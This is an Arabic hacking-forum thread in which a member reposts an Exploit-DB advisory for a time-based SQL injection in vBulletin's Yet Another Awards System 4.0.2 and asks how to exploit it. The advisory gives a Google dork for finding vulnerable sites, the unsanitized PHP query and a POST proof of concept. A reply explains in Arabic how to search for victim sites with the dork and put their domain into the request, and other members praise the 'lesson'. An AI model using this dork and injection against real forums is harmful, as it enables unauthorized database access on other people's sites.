اشترك في قناتنا ليصلك جديدنا

اشترك في قناتنا على اليوتيوب ليصلك جديدنا

كذلك الاعجاب بصفحتنا على الفيسبوك

شباب بدى كيفية استغلال ثغرة System 4.0.2 SQL Injection

شباب بدى كيفية استغلال ثغرة System 4.0.2 SQL Injection


النتائج 1 إلى 8 من 8

الموضوع: شباب بدى كيفية استغلال ثغرة System 4.0.2 SQL Injection

  1. #1
    هكر مبتديء Array الصورة الرمزية santos7x7x
    تاريخ التسجيل
    Aug 2012
    المشاركات
    77

    new شباب بدى كيفية استغلال ثغرة System 4.0.2 SQL Injection



    شباب احدث ثغرات المنتديات هى ثغرة vBulletin Yet Another Awards System 4.0.2 SQL Injection

    وفى موقع السيكيورتى لئيت الكلام دة عن كيفية الاستغلال بس انا مش فاهم اى شئ من كل هاذا لان معظمهوا انجليزى وترجمة جوجل ما ساعدنى ياريت شباب المساعدة ضرورى

    # Exploit Title: vBulletin Yet Another Awards System 4.0.2 Time Based SQL Injection 0day
    # Google Dork: inurl:awards.php intext:"powered by vbulletin"
    # Date: 29/08/12
    # Exploit Author: [email protected]/Dan
    # Software Link: http://www.vbulletin.org/forum/showthread.php?t=232684
    # Version: 4.0.2+



    The vulnerability exists within /request_award.php.

    $vbulletin->input->clean_array_gpc('p', array(
    'award_id' => TYPE_UINT,
    //'award_request_name' => TYPE_STR,
    //'award_request_recipient_name' => TYPE_STR,
    'award_request_reason' => TYPE_STR,
    'award_request_uid' => TYPE_UNIT,
    ));

    > $award_request_uid = $vbulletin->GPC['award_request_uid'];
    > > $db->query_write("INSERT INTO " . TABLE_PREFIX . "award_requests (award_req_uid, award_rec_uid, award_req_aid, award_req_reason) VALUES ('$award_request_uid', '$award_request_uid', '$award[award_id]', '". $db->escape_string($vbulletin->GPC['award_request_reason']) ."')");

    $award_request_uid is used within an insert into statement, unsanitized.


    - POC -
    http://[site].com/request_award.php
    POST: do=submit&name=award_id=[VALID REWARD ID]&award_request_reason=0&award_request_uid=0[SQL]&submit=Submit


    Thanks. Have fun.

    http://www.bugabuse.net/

    شو معنى كل هاذا؟؟؟ مو فاهم شئ ياريت التوضيح ولو بـ فيديو لو الشرح طويل



  2. #2
    هكر مجتهد Array الصورة الرمزية حبوط
    تاريخ التسجيل
    Dec 2010
    الدولة
    الســــــعودية
    المشاركات
    480

    افتراضي رد: شباب بدى كيفية استغلال ثغرة System 4.0.2 SQL Injection

    السكربت المصاب : vBulletin
    دورك استخراج المواقع المصابة بالثغرة : # Google Dork: inurl:awards.php
    intext:"powered by vbulletin"
    معطيك دورك اثنين تمسك واحد فيهم وتضعه في اي محرك بحث مثلااا Google
    بتعمل بحث وتطلع المواقع المصابة
    وقت نزول الثغرة : Date: 29/08/12
    رابط السكربت المصاب :

    http://www.vbulletin.org/forum/showthread.php?t=232684
    اصدار السكربت المصاب : Version: 4.0.2

    الكود البرمجي المصاب بالثغرة :

    $vbulletin->input->clean_array_gpc('p', array(
    'award_id' => TYPE_UINT,
    //'award_request_name' => TYPE_STR,
    //'award_request_recipient_name' => TYPE_STR,
    'award_request_reason' => TYPE_STR,
    'award_request_uid' => TYPE_UNIT,
    ));

    > $award_request_uid = $vbulletin->GPC['award_request_uid'];
    > > $db->query_write("INSERT INTO " . TABLE_PREFIX . "award_requests (award_req_uid, award_rec_uid, award_req_aid, award_req_reason) VALUES ('$award_request_uid', '$award_request_uid', '$award[award_id]', '". $db->escape_string($vbulletin->GPC['award_request_reason']) ."')");

    $award_request_uid is used within an insert into statement, unsanitized.


    استغلال الثغرة :
    http://[site].com/request_award.php
    بدال [site] دومين الموقع


    بالتوفيق ...


  3. #3
    هكر نشيط Array الصورة الرمزية hack:muthm
    تاريخ التسجيل
    Sep 2012
    المشاركات
    119

    افتراضي رد: شباب بدى كيفية استغلال ثغرة System 4.0.2 SQL Injection

    بصراحه درس مفيد



  4. #4
    هكر متميز Array الصورة الرمزية jok17
    تاريخ التسجيل
    Oct 2010
    الدولة
    Deep-Web
    المشاركات
    733

    افتراضي رد: شباب بدى كيفية استغلال ثغرة System 4.0.2 SQL Injection

    machkoooooooooooooooooooooooooooooor


  5. #5
    هكر مبتديء Array الصورة الرمزية santos7x7x
    تاريخ التسجيل
    Aug 2012
    المشاركات
    77

    افتراضي رد: شباب بدى كيفية استغلال ثغرة System 4.0.2 SQL Injection

    حياك الله اخى مشكور اكتر والله


  6. #6
    هكر متألق Array الصورة الرمزية سارة الغامدي
    تاريخ التسجيل
    Jan 2012
    المشاركات
    6,473

    افتراضي رد: شباب بدى كيفية استغلال ثغرة System 4.0.2 SQL Injection

    يوضع في القسم المناسب



  7. #7
    هكر مبتديء Array
    تاريخ التسجيل
    Jun 2012
    الدولة
    بلاد الحرمين الشرفين
    المشاركات
    31

    افتراضي رد: شباب بدى كيفية استغلال ثغرة System 4.0.2 SQL Injection

    نااااايس مفيد جداااا


  8. #8
    :: مشرف عام :: Array الصورة الرمزية QtRoNiX FoX
    تاريخ التسجيل
    Dec 2011
    الدولة
    فلسطين
    المشاركات
    813

    افتراضي رد: شباب بدى كيفية استغلال ثغرة System 4.0.2 SQL Injection

    افادك الاخ حبوط الغالي
    وعلى شان بالمرة القادمة لما تشوف ثغرة بمواقع الثغرات بهذا الشكل ، ما تحتاج الى مساعدة من اي شخص وتكون انت بنفسك فاهم كل شي
    تفضل اخوي هاي دروس شرح موقع الثغرات Exploit Database

    شرح مفصل لموقع السكيورتي www.exploit-db.com
    |ألدرس السادس والعشرون| شرح موقع الثغرات Exploit-db بالتفصيل

    باتوفيق


المواضيع المتشابهه

  1. شرح استغلال ثغرة vBulletin 3.8.6
    بواسطة She!! Access في المنتدى قسم الثغرات
    مشاركات: 42
    آخر مشاركة: 04-09-2013, 04:50 PM
  2. شرح استغلال ثغرات sql injection جاهزه
    بواسطة BLACK.JaGuAr في المنتدى قسم الثغرات
    مشاركات: 77
    آخر مشاركة: 12-22-2011, 08:27 AM
  3. استغلال ثغرة الاهدائات
    بواسطة HuNtEr2 في المنتدى قسم الثغرات
    مشاركات: 21
    آخر مشاركة: 11-10-2010, 02:44 AM
  4. شرح استغلال ثغرة vBSEO
    بواسطة She!! Access في المنتدى قسم الثغرات
    مشاركات: 4
    آخر مشاركة: 09-02-2010, 09:26 PM

وجد الزوار هذه الصفحة بالبحث عن:

شرح استغلال ثغرة vbulletin

sql injection شرح

شرح استغلال vBulletin

شرح ثغرة sql injection

كيفية استغلال ثغرة sql

معنى ثغره SQL وكيفيه استغلالها

شرح استغلال ثغرات sql

كيفيةاختراق ثغرة

شرح استغلال ثغرة sql injection

vBulletin Yet Another Awards System 4.0.2 SQL Injection

كيفية الاستغلال من

استغلال ثغرة sql injection

vbulletin yet another awards system 4.0.2 sql injection شرح استغلال

مواقع لكشف اخر الثغرات وكيفيه استغلالها

شرح استغلال ثغرة sql

0day.php دورك

كىفىة استغلال

طريقة استغلال vBulletin شرح استغلال vBulletin Yet Another Awards System 4.0.2 SQL Injectionاستغلال ثغرة sqlsql injection استغلالكيفية استغلال الثغراتكيفية استغلال ثغرات sqlشرح ثغرة sql 2كيف اعرف الاستغلال في ملف الثغرة

المفضلات

أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •